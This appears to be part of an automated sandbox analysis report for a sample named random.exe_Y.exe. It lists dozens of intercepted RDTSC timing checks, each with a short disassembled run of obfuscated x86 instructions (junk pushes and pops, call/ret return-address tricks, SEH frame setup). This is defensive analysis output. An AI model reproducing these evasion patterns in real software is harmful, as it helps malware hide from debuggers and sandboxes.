                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B7C78 second address: 2B7C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B7C7D second address: 2B7C82 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B815B second address: 2B816E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3458756CA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B816E second address: 2B8172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B8172 second address: 2B817C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3458756CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B82E8 second address: 2B82F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3458CA5146h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B9D5A second address: 2B9DBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3458756CB2h 0x0000000f nop 0x00000010 mov edi, ebx 0x00000012 movsx edi, ax 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F3458756CA8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 xor esi, 04C35200h 0x00000037 push 00000000h 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c jnc 00007F3458756CA8h 0x00000042 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2B9DBB second address: 2B9DCD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3458CA5148h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BA79F second address: 2BA7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BB7E1 second address: 2BB845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3458CA514Ch 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F3458CA5148h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 00000000h 0x0000002a add dword ptr [ebp+122D3A96h], edi 0x00000030 push edx 0x00000031 jmp 00007F3458CA514Ch 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 mov si, di 0x0000003c push eax 0x0000003d jmp 00007F3458CA5150h 0x00000042 pop edi 0x00000043 xchg eax, ebx 0x00000044 pushad 0x00000045 push ecx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BC1FF second address: 2BC20B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BC20B second address: 2BC20F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BCDDF second address: 2BCE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3458756CA6h 0x0000000a popad 0x0000000b pop edx 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F3458756CA8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F3458756CA8h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 push edi 0x00000046 movsx edi, bx 0x00000049 pop edi 0x0000004a push 00000000h 0x0000004c movsx esi, bx 0x0000004f and edi, dword ptr [ebp+122D5AFCh] 0x00000055 xchg eax, ebx 0x00000056 push ebx 0x00000057 push ebx 0x00000058 pushad 0x00000059 popad 0x0000005a pop ebx 0x0000005b pop ebx 0x0000005c push eax 0x0000005d pushad 0x0000005e jmp 00007F3458756CB8h 0x00000063 push eax 0x00000064 push edx 0x00000065 jng 00007F3458756CA6h 0x0000006b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BCB41 second address: 2BCB56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BD9C8 second address: 2BD9CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BD9CC second address: 2BD9D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BE4AB second address: 2BE4AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BE4AF second address: 2BE4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F3458CA5148h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 js 00007F3458CA5146h 0x0000002a push 00000000h 0x0000002c sub dword ptr [ebp+124666A2h], eax 0x00000032 xchg eax, ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 push ecx 0x00000036 jmp 00007F3458CA5154h 0x0000003b pop ecx 0x0000003c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BE4FC second address: 2BE50F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3458756CA8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BE50F second address: 2BE526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458CA5153h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BE526 second address: 2BE52A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BEEE2 second address: 2BEEEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F3458CA5146h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2BEEEC second address: 2BEF58 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3458756CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F3458756CA8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 xor edi, dword ptr [ebp+1246F927h] 0x0000002d push 00000000h 0x0000002f mov esi, eax 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F3458756CA8h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d push ebx 0x0000004e mov esi, dword ptr [ebp+122D2C2Ch] 0x00000054 pop edi 0x00000055 xchg eax, ebx 0x00000056 push ebx 0x00000057 push ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C3043 second address: 2C304D instructions: 0x00000000 rdtsc 0x00000002 js 00007F3458CA514Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C5103 second address: 2C5109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C5109 second address: 2C510E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C6095 second address: 2C60A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3458756CA6h 0x0000000a popad 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C60A0 second address: 2C6167 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007F3458CA5165h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F3458CA5148h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jmp 00007F3458CA514Ch 0x00000030 movsx edi, si 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F3458CA5148h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f push ebx 0x00000050 adc bx, 51C7h 0x00000055 pop ebx 0x00000056 pushad 0x00000057 call 00007F3458CA5158h 0x0000005c or dword ptr [ebp+122D2B3Dh], edx 0x00000062 pop ecx 0x00000063 popad 0x00000064 push 00000000h 0x00000066 movzx ebx, dx 0x00000069 xchg eax, esi 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F3458CA514Ah 0x00000071 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C8F88 second address: 2C9025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b jmp 00007F3458756CB6h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F3458756CA8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov bx, si 0x0000002e push 00000000h 0x00000030 mov ebx, esi 0x00000032 mov dword ptr [ebp+122D1BDEh], edx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007F3458756CA8h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 xchg eax, esi 0x00000055 push esi 0x00000056 jmp 00007F3458756CADh 0x0000005b pop esi 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jne 00007F3458756CACh 0x00000065 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C0B1A second address: 2C0B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C9025 second address: 2C902A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C72C2 second address: 2C72C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C0B1E second address: 2C0B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F3458756CACh 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C32DD second address: 2C32E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C0B34 second address: 2C0B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458756CB2h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C32E1 second address: 2C32E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CC025 second address: 2CC029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C32E7 second address: 2C3302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CC029 second address: 2CC02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C3302 second address: 2C330C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CC02F second address: 2CC035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2C330C second address: 2C3310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CC035 second address: 2CC039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CC039 second address: 2CC046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CD0B4 second address: 2CD124 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F3458756CA8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D21BBh], edi 0x00000027 push 00000000h 0x00000029 mov di, 6718h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007F3458756CA8h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D1BDEh], esi 0x0000004f pushad 0x00000050 or dword ptr [ebp+12450F47h], edx 0x00000056 mov ecx, 7754E434h 0x0000005b popad 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 push esi 0x00000062 pop esi 0x00000063 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CD124 second address: 2CD12E instructions: 0x00000000 rdtsc 0x00000002 js 00007F3458CA5146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CC156 second address: 2CC17B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F3458756CB9h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CC17B second address: 2CC186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3458CA5146h 0x0000000a popad 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CC186 second address: 2CC190 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3458756CACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CC190 second address: 2CC241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F3458CA5148h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov bx, 83D1h 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov dword ptr [ebp+122D3169h], ebx 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F3458CA5148h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 push edi 0x00000054 sub dword ptr [ebp+122D28EEh], edx 0x0000005a pop edi 0x0000005b mov eax, dword ptr [ebp+122D02F5h] 0x00000061 call 00007F3458CA5153h 0x00000066 mov dword ptr [ebp+122D1C6Fh], eax 0x0000006c pop ebx 0x0000006d push FFFFFFFFh 0x0000006f jmp 00007F3458CA514Ah 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 jmp 00007F3458CA5151h 0x0000007d jbe 00007F3458CA5146h 0x00000083 popad 0x00000084 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CD345 second address: 2CD349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2D0117 second address: 2D0168 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3458CA5148h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d sub bl, FFFFFF87h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F3458CA5148h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D1D96h] 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+12459D00h], esi 0x0000003a mov dword ptr [ebp+122D3131h], edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jbe 00007F3458CA514Ch 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CF24F second address: 2CF253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CF253 second address: 2CF25D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CF25D second address: 2CF261 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CF261 second address: 2CF309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D3253h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F3458CA5148h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 push edx 0x00000039 xor bx, BA66h 0x0000003e pop edi 0x0000003f mov eax, dword ptr [ebp+122D1525h] 0x00000045 push 00000000h 0x00000047 push edi 0x00000048 call 00007F3458CA5148h 0x0000004d pop edi 0x0000004e mov dword ptr [esp+04h], edi 0x00000052 add dword ptr [esp+04h], 00000019h 0x0000005a inc edi 0x0000005b push edi 0x0000005c ret 0x0000005d pop edi 0x0000005e ret 0x0000005f mov ebx, edi 0x00000061 push FFFFFFFFh 0x00000063 mov ebx, dword ptr [ebp+122D2EC8h] 0x00000069 nop 0x0000006a jl 00007F3458CA5165h 0x00000070 jnl 00007F3458CA515Fh 0x00000076 push eax 0x00000077 pushad 0x00000078 jnp 00007F3458CA514Ch 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CF309 second address: 2CF315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jne 00007F3458756CA6h 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2CF315 second address: 2CF319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2D024C second address: 2D0250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2D0250 second address: 2D02D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3458CA5155h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F3458CA5148h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov di, DC6Eh 0x0000002d mov bx, 1D15h 0x00000031 push dword ptr fs:[00000000h] 0x00000038 mov ebx, ecx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov ebx, eax 0x00000043 mov eax, dword ptr [ebp+122D0F41h] 0x00000049 jnc 00007F3458CA514Ch 0x0000004f push FFFFFFFFh 0x00000051 mov dword ptr [ebp+122D3A5Eh], edi 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a js 00007F3458CA514Ch 0x00000060 jng 00007F3458CA5146h 0x00000066 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2D11BD second address: 2D122C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jp 00007F3458756CA6h 0x0000000b pop edx 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov di, dx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a jmp 00007F3458756CAAh 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F3458756CA8h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 mov bh, ch 0x00000042 mov eax, dword ptr [ebp+122D1249h] 0x00000048 mov edi, 19FB3DC0h 0x0000004d push FFFFFFFFh 0x0000004f mov dword ptr [ebp+12467CE0h], ecx 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 ja 00007F3458756CA8h 0x0000005e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 2D122C second address: 2D1237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F3458CA5146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
